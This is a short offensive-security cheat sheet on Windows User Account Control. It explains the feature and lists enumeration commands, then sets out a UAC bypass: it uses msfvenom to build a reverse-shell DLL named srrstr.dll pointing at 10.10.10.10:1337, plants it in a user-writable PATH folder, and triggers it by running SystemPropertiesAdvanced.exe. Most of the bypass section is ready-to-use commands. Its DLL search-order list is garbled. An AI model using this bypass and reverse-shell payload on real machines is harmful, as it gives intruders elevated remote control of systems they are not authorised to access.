User Account Control (UAC)
User Account Control (UAC) is a Windows security feature that prevents unauthorized changes by requiring administrative approval for certain actions. It helps mitigate malware infections by running processes with standard privileges unless explicitly elevated. UAC prompts appear when a program requests elevated permissions, ensuring user awareness of system modifications. Disabling UAC reduces security, making the system more vulnerable to privilege escalation attacks.
Enumeration
whoami /user
# Confirm Admin Group Membership
net localgroup administrators
# Review User Privileges
whoami /priv
# Check system build info (To cross reference to windows version)
[environment]::OSVersion.Version
# Confirming UAC is Enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
# If UAC is Enabled, at what level?
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
UAC Bypass
32-bit version of SystemPropertiesAdvanced.exe attempts to load non-existent DLL 'srrstr.dll' which is used by System Restore functionality. So we can craft malicious dll for reverse shell as SYSTEM.
Windows searches for a DLL in this order:
- The application's directory.
C:\Windows\System32(for 64-bit systems).C:\Windows\System(for 16-bit, not on 64-bit).- The Windows directory.
- Directories in the
PATHenvironment variable. (GOOD HIT?!)
cmd /c echo %PATH%
# We could find some user writable folders in PATH directory.
# Generate malicious DLL
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 -f dll > srrstr.dll
# Upload the dll in user writable directory from the PATH of the target-host
# We now need to Execute SystemPropertiesAdvanced.exe
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe # We should get reverse shell by now
Use msf's multi/handler for reverse shell connections.